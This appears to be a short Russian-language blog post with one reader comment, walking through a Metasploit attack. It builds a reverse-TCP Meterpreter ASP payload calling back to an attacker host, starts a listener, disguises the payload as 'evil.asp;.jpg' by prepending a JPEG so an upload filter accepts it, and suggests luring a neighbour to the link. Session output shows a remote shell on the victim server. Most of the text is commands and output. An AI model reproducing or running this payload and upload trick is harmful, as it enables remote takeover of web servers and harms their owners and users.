Сначала мы сгенерируем ASP скрипт, который подключит Meterpreter назад, к нашей машине:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Теперь нам нужно сделать так, чтобы msfconsole приняло входящее соединение:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
Чтоб обойти проверку на содержание изображения, мы предварим наш ASP скрипт изображением в формате JPG:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Теперь отправляем наше «evil.asp;. Jpg" изображение через выбранное Веб приложение. Так как расширение нашего файла оканчивается на "jpg", а содержание файла кажется JPEG , Веб приложение принимает наш файл и переименовывает его в "/ images / evil.asp;. Jpg"
Наконец мы впариваем URL ссылку (с нашим изображением) нашему соседу и когда он по ней переходит - это активирует нашу начинку и создаст сессию снашей msfconsole:
[*] Starting the payload handler...Extrait de metasploit.com
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
а где должен появиться файл с картинкой?
RépondreSupprimer